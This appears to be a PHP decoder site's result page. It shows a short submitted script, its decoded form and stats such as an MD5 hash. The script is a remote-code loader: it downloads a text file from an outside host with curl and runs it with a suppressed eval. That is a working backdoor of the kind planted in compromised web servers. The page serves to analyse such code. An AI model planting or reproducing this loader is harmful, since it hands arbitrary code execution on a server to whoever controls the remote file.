Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $url = "https://dy1s.hjhdy.com/dy/zzz.txt"; $ch = curl_init($url); curl_setopt(..
Decoded Output download
<?php
$url = "https://dy1s.hjhdy.com/dy/zzz.txt";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
@eval(/**/("?>".$result));
?>
Did this file decode correctly?
Original Code
<?php
$url = "https://dy1s.hjhdy.com/dy/zzz.txt";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
@eval(/**/("?>".$result));
?>
Function Calls
curl_init | 1 |
Stats
MD5 | be3262535117ff1b9654bad718f73bcf |
Eval Count | 0 |
Decode Time | 51 ms |